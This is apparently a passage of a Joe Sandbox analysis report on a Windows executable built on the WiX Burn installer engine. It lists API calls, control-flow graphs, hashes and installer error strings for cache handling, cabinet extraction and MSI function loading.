                                                                                                                • Failed to seek to checksum in exe header., xrefs: 009B8805
                                                                                                                • Failed to seek to original data in exe burn section header., xrefs: 009B88DB
                                                                                                                • cache.cpp, xrefs: 009B8744, 009B87FB, 009B8862, 009B88D1
                                                                                                                • Failed to update signature offset., xrefs: 009B8821
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$ErrorLast$CloseCreateHandlePointerRead
                                                                                                                • String ID: Failed to copy engine from: %ls to: %ls$Failed to create engine file at path: %ls$Failed to seek to beginning of engine file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cabinet.dll$cache.cpp$msi.dll
                                                                                                                • API String ID: 3456208997-1976062716
                                                                                                                • Opcode ID: 8240cccfd1b0ae4a1c5afe92df8e3b585b1495e10eb2e1e31325fbf1ecd00959
                                                                                                                • Instruction ID: a3d755ba9793cea8836341b30f2b976bbccd91eb6c14e224944751a4a795096b
                                                                                                                • Opcode Fuzzy Hash: 8240cccfd1b0ae4a1c5afe92df8e3b585b1495e10eb2e1e31325fbf1ecd00959
                                                                                                                • Instruction Fuzzy Hash: E451C772A4163AABDB125A948D46FBF756CAF88B30F110524FF10FB281EA549C00D7E1

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1481 9a762c-9a7edf InitializeCriticalSection 1482 9a7ee2-9a7f06 call 9a5623 1481->1482 1485 9a7f08-9a7f0f 1482->1485 1486 9a7f13-9a7f24 call 9e0237 1482->1486 1485->1482 1488 9a7f11 1485->1488 1489 9a7f27-9a7f39 call 9ce06f 1486->1489 1488->1489
                                                                                                                APIs
                                                                                                                • InitializeCriticalSection.KERNEL32(009B756B,009A53BD,00000000,009A5445), ref: 009A764C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalInitializeSection
                                                                                                                • String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion
                                                                                                                • API String ID: 32694325-3635313340
                                                                                                                • Opcode ID: d9539dfddcde36abd7cae3bba63e1d57734fd4b17d8241213c3b0d782449b58a
                                                                                                                • Instruction ID: 90523ec3f0c4885b84b5d044f1cc1bffc70984a91602ac18d267c6de59b9d43a
                                                                                                                • Opcode Fuzzy Hash: d9539dfddcde36abd7cae3bba63e1d57734fd4b17d8241213c3b0d782449b58a
                                                                                                                • Instruction Fuzzy Hash: 4A3256F0D157699FDB768F5AC98878DFAF4BB49304F5081EED25CA6210C7B00A898F85

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1493 9b82ba-9b8303 call 9cf8e0 1496 9b8309-9b8317 GetCurrentProcess call 9e0879 1493->1496 1497 9b847c-9b8489 call 9a2195 1493->1497 1501 9b831c-9b8329 1496->1501 1502 9b848b 1497->1502 1503 9b8498-9b84aa call 9ce06f 1497->1503 1504 9b832f-9b833e GetWindowsDirectoryW 1501->1504 1505 9b83b7-9b83c5 GetTempPathW 1501->1505 1506 9b8490-9b8497 call 9e0237 1502->1506 1508 9b8378-9b8389 call 9a337f 1504->1508 1509 9b8340-9b834a GetLastError 1504->1509 1510 9b83ff-9b8411 UuidCreate 1505->1510 1511 9b83c7-9b83d1 GetLastError 1505->1511 1506->1503 1531 9b838b-9b8390 1508->1531 1532 9b8395-9b83ab call 9a36a3 1508->1532 1512 9b834c-9b8355 1509->1512 1513 9b8357 1509->1513 1518 9b841a-9b842f StringFromGUID2 1510->1518 1519 9b8413-9b8418 1510->1519 1514 9b83de 1511->1514 1515 9b83d3-9b83dc 1511->1515 1512->1513 1521 9b8359 1513->1521 1522 9b835e-9b8373 call 9a3821 1513->1522 1523 9b83e0 1514->1523 1524 9b83e5-9b83fa call 9a3821 1514->1524 1515->1514 1527 9b844d-9b846e call 9a1f13 1518->1527 1528 9b8431-9b844b call 9a3821 1518->1528 1519->1506 1521->1522 1522->1506 1523->1524 1524->1506 1541 9b8470-9b8475 1527->1541 1542 9b8477 1527->1542 1528->1506 1531->1506 1532->1510 1543 9b83ad-9b83b2 1532->1543 1541->1506 1542->1497 1543->1506
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,009A5489), ref: 009B8310
                                                                                                                  • Part of subcall function 009E0879: OpenProcessToken.ADVAPI32(?,00000008,?,009A53BD,00000000,?,?,?,?,?,?,?,009B769D,00000000), ref: 009E0897
                                                                                                                  • Part of subcall function 009E0879: GetLastError.KERNEL32(?,?,?,?,?,?,?,009B769D,00000000), ref: 009E08A1
                                                                                                                  • Part of subcall function 009E0879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,009B769D,00000000), ref: 009E092B
                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 009B8336
                                                                                                                • GetLastError.KERNEL32 ref: 009B8340
                                                                                                                • GetTempPathW.KERNEL32(00000104,?,00000000), ref: 009B83BD
                                                                                                                • GetLastError.KERNEL32 ref: 009B83C7
                                                                                                                • UuidCreate.RPCRT4(?), ref: 009B8406
                                                                                                                Strings
                                                                                                                • Failed to concat Temp directory on windows path for working folder., xrefs: 009B83AD
                                                                                                                • Failed to convert working folder guid into string., xrefs: 009B8446
                                                                                                                • Failed to create working folder guid., xrefs: 009B8413
                                                                                                                • Failed to get windows path for working folder., xrefs: 009B836E
                                                                                                                • %ls%ls\, xrefs: 009B8458
                                                                                                                • Failed to get temp path for working folder., xrefs: 009B83F5
                                                                                                                • Failed to append bundle id on to temp path for working folder., xrefs: 009B8470
                                                                                                                • Temp\, xrefs: 009B8395
                                                                                                                • cache.cpp, xrefs: 009B8364, 009B83EB, 009B843C
                                                                                                                • Failed to ensure windows path for working folder ended in backslash., xrefs: 009B838B
                                                                                                                • Failed to copy working folder path., xrefs: 009B848B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
                                                                                                                • String ID: %ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
                                                                                                                • API String ID: 266130487-819636856
                                                                                                                • Opcode ID: 4f20cd89b98d0a6cb1ce16c2f1bb3853303e03d97525337b8f9fd34453947df3
                                                                                                                • Instruction ID: 45f34578a8e5cb3d134c6e8e89bacda5caabf9fe5780602e7b42c7bd0ee06290
                                                                                                                • Opcode Fuzzy Hash: 4f20cd89b98d0a6cb1ce16c2f1bb3853303e03d97525337b8f9fd34453947df3
                                                                                                                • Instruction Fuzzy Hash: 6541E833E45329B7D73096A58D4AFEB73ACAB88B24F104565BB04EB150EE749D00C7E1

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1544 9c10fb-9c1127 CoInitializeEx 1545 9c1129-9c1136 call 9e0237 1544->1545 1546 9c113b-9c1186 call 9df483 1544->1546 1551 9c139e-9c13b0 call 9ce06f 1545->1551 1552 9c1188-9c11ab call 9a3821 call 9e0237 1546->1552 1553 9c11b0-9c11d2 call 9df4a4 1546->1553 1570 9c1397-9c1398 CoUninitialize 1552->1570 1561 9c128c-9c1297 SetEvent 1553->1561 1562 9c11d8-9c11e0 1553->1562 1563 9c1299-9c12a3 GetLastError 1561->1563 1564 9c12d6-9c12e4 WaitForSingleObject 1561->1564 1566 9c138f-9c1392 call 9df4b4 1562->1566 1567 9c11e6-9c11ec 1562->1567 1568 9c12a5-9c12ae 1563->1568 1569 9c12b0 1563->1569 1573 9c1318-9c1323 ResetEvent 1564->1573 1574 9c12e6-9c12f0 GetLastError 1564->1574 1566->1570 1567->1566 1572 9c11f2-9c11fa 1567->1572 1568->1569 1575 9c12b4-9c12c4 call 9a3821 1569->1575 1576 9c12b2 1569->1576 1570->1551 1579 9c11fc-9c11fe 1572->1579 1580 9c1274-9c1287 call 9e0237 1572->1580 1577 9c135a-9c1360 1573->1577 1578 9c1325-9c132f GetLastError 1573->1578 1581 9c12fd 1574->1581 1582 9c12f2-9c12fb 1574->1582 1605 9c12c9-9c12d1 call 9e0237 1575->1605 1576->1575 1588 9c138a 1577->1588 1589 9c1362-9c1365 1577->1589 1583 9c133c 1578->1583 1584 9c1331-9c133a 1578->1584 1586 9c1200 1579->1586 1587 9c1211-9c1214 1579->1587 1580->1566 1591 9c12ff 1581->1591 1592 9c1301-9c1316 call 9a3821 1581->1592 1582->1581 1594 9c133e 1583->1594 1595 9c1340-9c1355 call 9a3821 1583->1595 1584->1583 1597 9c1206-9c120f 1586->1597 1598 9c1202-9c1204 1586->1598 1601 9c126e 1587->1601 1602 9c1216 1587->1602 1588->1566 1599 9c1386-9c1388 1589->1599 1600 9c1367-9c1381 call 9a3821 1589->1600 1591->1592 1592->1605 1594->1595 1595->1605 1607 9c1270-9c1272 1597->1607 1598->1607 1599->1566 1600->1605 1601->1607 1609 9c125c-9c1261 1602->1609 1610 9c121d-9c1222 1602->1610 1611 9c124e-9c1253 1602->1611 1612 9c1239-9c123e 1602->1612 1613 9c126a-9c126c 1602->1613 1614 9c122b-9c1230 1602->1614 1615 9c1224-9c1229 1602->1615 1616 9c1255-9c125a 1602->1616 1617 9c1247-9c124c 1602->1617 1618 9c1240-9c1245 1602->1618 1619 9c1232-9c1237 1602->1619 1620 9c1263-9c1268 1602->1620 1605->1566 1607->1561 1607->1580 1609->1580 1610->1580 1611->1580 1612->1580 1613->1580 1614->1580 1615->1580 1616->1580 1617->1580 1618->1580 1619->1580 1620->1580
                                                                                                                APIs
                                                                                                                • CoInitializeEx.OLE32(00000000,00000000), ref: 009C111D
                                                                                                                • CoUninitialize.COMBASE ref: 009C1398
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeUninitialize
                                                                                                                • String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                • API String ID: 3442037557-1168358783
                                                                                                                • Opcode ID: dc95686256ea73e06c5ae1a669470c4ecb9df2db3859fa1b4dfe4e918fa8783d
                                                                                                                • Instruction ID: 78f72f48a6804c94a7d25c1c02118dfb0ac06525ebdd3c5c70bcc1dba12b3cd2
                                                                                                                • Opcode Fuzzy Hash: dc95686256ea73e06c5ae1a669470c4ecb9df2db3859fa1b4dfe4e918fa8783d
                                                                                                                • Instruction Fuzzy Hash: 5E51693AE842A5D7DF2056958C05F7B36589BC3774B22436EBE21FB392D6198C0092DB

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1625 9a42d7-9a432e InitializeCriticalSection * 2 call 9b4d05 * 2 1630 9a4452-9a445c call 9ab48b 1625->1630 1631 9a4334 1625->1631 1636 9a4461-9a4465 1630->1636 1632 9a433a-9a4347 1631->1632 1634 9a434d-9a4379 lstrlenW * 2 CompareStringW 1632->1634 1635 9a4445-9a444c 1632->1635 1637 9a43cb-9a43f7 lstrlenW * 2 CompareStringW 1634->1637 1638 9a437b-9a439e lstrlenW 1634->1638 1635->1630 1635->1632 1639 9a4467-9a4473 call 9e0237 1636->1639 1640 9a4474-9a447c 1636->1640 1637->1635 1644 9a43f9-9a441c lstrlenW 1637->1644 1641 9a448a-9a449f call 9a3821 1638->1641 1642 9a43a4-9a43a9 1638->1642 1639->1640 1657 9a44a4-9a44ab 1641->1657 1642->1641 1645 9a43af-9a43bf call 9a29ce 1642->1645 1648 9a4422-9a4427 1644->1648 1649 9a44b6-9a44d0 call 9a3821 1644->1649 1660 9a447f-9a4488 1645->1660 1661 9a43c5 1645->1661 1648->1649 1653 9a442d-9a443d call 9a29ce 1648->1653 1649->1657 1653->1660 1663 9a443f 1653->1663 1658 9a44ac-9a44b4 call 9e0237 1657->1658 1658->1640 1660->1658 1661->1637 1663->1635
                                                                                                                APIs
                                                                                                                • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,009A5266,?,?,00000000,?,?), ref: 009A4303
                                                                                                                • InitializeCriticalSection.KERNEL32(000000D0,?,?,009A5266,?,?,00000000,?,?), ref: 009A430C
                                                                                                                • lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,009A5266,?,?,00000000,?,?), ref: 009A4352
                                                                                                                • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,009A5266,?,?,00000000,?,?), ref: 009A435C
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,009A5266,?,?,00000000,?,?), ref: 009A4370
                                                                                                                • lstrlenW.KERNEL32(burn.filehandle.attached,?,?,009A5266,?,?,00000000,?,?), ref: 009A4380
                                                                                                                • lstrlenW.KERNEL32(burn.filehandle.self,?,?,009A5266,?,?,00000000,?,?), ref: 009A43D0
                                                                                                                • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,009A5266,?,?,00000000,?,?), ref: 009A43DA
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,009A5266,?,?,00000000,?,?), ref: 009A43EE
                                                                                                                • lstrlenW.KERNEL32(burn.filehandle.self,?,?,009A5266,?,?,00000000,?,?), ref: 009A43FE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen$CompareCriticalInitializeSectionString
                                                                                                                • String ID: Failed to initialize engine section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$engine.cpp
                                                                                                                • API String ID: 3039292287-3209860532
                                                                                                                • Opcode ID: 2e4aa52ce53f4cf1945a5090994c48b8d9b3f4ddadee95f21e25fdf1c048e851
                                                                                                                • Instruction ID: 6ab62b90ed749b8150a336cae1d45d61ce5635f34d34234e83232e39c5117b7d
                                                                                                                • Opcode Fuzzy Hash: 2e4aa52ce53f4cf1945a5090994c48b8d9b3f4ddadee95f21e25fdf1c048e851
                                                                                                                • Instruction Fuzzy Hash: FF51B271A04256BECB21DB69CC86F9B77ECEF85760F100115F614D72A1D7B0AD50CAE0
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,009AC47F,009A5405,?,?,009A5445), ref: 009AC2D6
                                                                                                                • GetLastError.KERNEL32(?,009AC47F,009A5405,?,?,009A5445,009A5445,00000000,?,00000000), ref: 009AC2E7
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,009AC47F,009A5405,?,?,009A5445,009A5445,00000000,?), ref: 009AC336
                                                                                                                • GetCurrentProcess.KERNEL32(000000FF,00000000,?,009AC47F,009A5405,?,?,009A5445,009A5445,00000000,?,00000000), ref: 009AC33C
                                                                                                                • DuplicateHandle.KERNELBASE(00000000,?,009AC47F,009A5405,?,?,009A5445,009A5445,00000000,?,00000000), ref: 009AC33F
                                                                                                                • GetLastError.KERNEL32(?,009AC47F,009A5405,?,?,009A5445,009A5445,00000000,?,00000000), ref: 009AC349
                                                                                                                • SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,009AC47F,009A5405,?,?,009A5445,009A5445,00000000,?,00000000), ref: 009AC39B
                                                                                                                • GetLastError.KERNEL32(?,009AC47F,009A5405,?,?,009A5445,009A5445,00000000,?,00000000), ref: 009AC3A5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                                                                                • String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
                                                                                                                • API String ID: 2619879409-373955632
                                                                                                                • Opcode ID: 3c0c5e0efe6f3ba2987a1549c16a51491f3fa75d77722baaaca1468dadc52f23
                                                                                                                • Instruction ID: 3e0d59ec7f57a5f4a3bec9ed7b8de4a782d0a04147948b3f9b8016f2e603c1ef
                                                                                                                • Opcode Fuzzy Hash: 3c0c5e0efe6f3ba2987a1549c16a51491f3fa75d77722baaaca1468dadc52f23
                                                                                                                • Instruction Fuzzy Hash: A041B576140241ABDF219E5A8C49F1B3AA9EFC6720B218429FA24AF351DB71DC019BE0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009A3838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 009A3877
                                                                                                                  • Part of subcall function 009A3838: GetLastError.KERNEL32 ref: 009A3881
                                                                                                                  • Part of subcall function 009E4A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 009E4A9D
                                                                                                                • GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 009E2B41
                                                                                                                • GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 009E2B61
                                                                                                                • GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 009E2B81
                                                                                                                • GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 009E2BA1
                                                                                                                • GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 009E2BC1
                                                                                                                • GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 009E2BE1
                                                                                                                • GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 009E2C01
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ErrorLast$DirectorySystem
                                                                                                                • String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
                                                                                                                • API String ID: 2510051996-1735120554
                                                                                                                • Opcode ID: 9107a981b09b25d5f69b1a1d9fd6aaab61864092c2f2b249c7d885ecb7f3c0d2
                                                                                                                • Instruction ID: f69a0e6ca8eb111a0c74fa63f62093f1b5fc1af113b0e5a519e76687eb3981af
                                                                                                                • Opcode Fuzzy Hash: 9107a981b09b25d5f69b1a1d9fd6aaab61864092c2f2b249c7d885ecb7f3c0d2
                                                                                                                • Instruction Fuzzy Hash: 7631B4709A124CEFDB12DFA1EF46B657BA9F715708F00062AE404562B0EBB70857AF74
                                                                                                                APIs
                                                                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,009AC3EB,?,00000000,?,009AC47F), ref: 009C1778
                                                                                                                • GetLastError.KERNEL32(?,009AC3EB,?,00000000,?,009AC47F,009A5405,?,?,009A5445,009A5445,00000000,?,00000000), ref: 009C1781
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateErrorEventLast
                                                                                                                • String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
                                                                                                                • API String ID: 545576003-938279966
                                                                                                                • Opcode ID: 3024db23b2c2a2780af165370a6c797f70277f64e106f02c7cc042d447ad9286
                                                                                                                • Instruction ID: 4288b13de088ea23ad65c3e2e72adc7e380d020beb477973de7613572dc9a605
                                                                                                                • Opcode Fuzzy Hash: 3024db23b2c2a2780af165370a6c797f70277f64e106f02c7cc042d447ad9286
                                                                                                                • Instruction Fuzzy Hash: 8D210EB7D4473A77E33116954C45F2B655CEF427B4B124129BF14BB282E754DC0086EB
                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 009DFCD6
                                                                                                                • GetProcAddress.KERNEL32(SystemFunction041), ref: 009DFCE8
                                                                                                                • GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 009DFD2B
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 009DFD3F
                                                                                                                • GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 009DFD77
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 009DFD8B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ErrorLast
                                                                                                                • String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$cryputil.cpp
                                                                                                                • API String ID: 4214558900-3191127217
                                                                                                                • Opcode ID: e9a70d2adf123db74282d06c715f327cac7ee0decce4a4e9351e48413b2ff7e4
                                                                                                                • Instruction ID: d77088ea4a25d0b4433d78c427fca991b64f3d13978aefeab263bac2d15147a5
                                                                                                                • Opcode Fuzzy Hash: e9a70d2adf123db74282d06c715f327cac7ee0decce4a4e9351e48413b2ff7e4
                                                                                                                • Instruction Fuzzy Hash: A221FB329D123DABC331DB95BE267067995FB10B55F018172EC13BA3E0E764AC02DAE0
                                                                                                                APIs
                                                                                                                • CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 009C08F2
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 009C090A
                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 009C090F
                                                                                                                • DuplicateHandle.KERNELBASE(00000000,?,?), ref: 009C0912
                                                                                                                • GetLastError.KERNEL32(?,?), ref: 009C091C
                                                                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 009C098B
                                                                                                                • GetLastError.KERNEL32(?,?), ref: 009C0998
                                                                                                                Strings
                                                                                                                • Failed to add virtual file pointer for cab container., xrefs: 009C0971
                                                                                                                • Failed to open cabinet file: %hs, xrefs: 009C09C9
                                                                                                                • <the>.cab, xrefs: 009C08EB
                                                                                                                • cabextract.cpp, xrefs: 009C0940, 009C09BC
                                                                                                                • Failed to duplicate handle to cab container., xrefs: 009C094A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
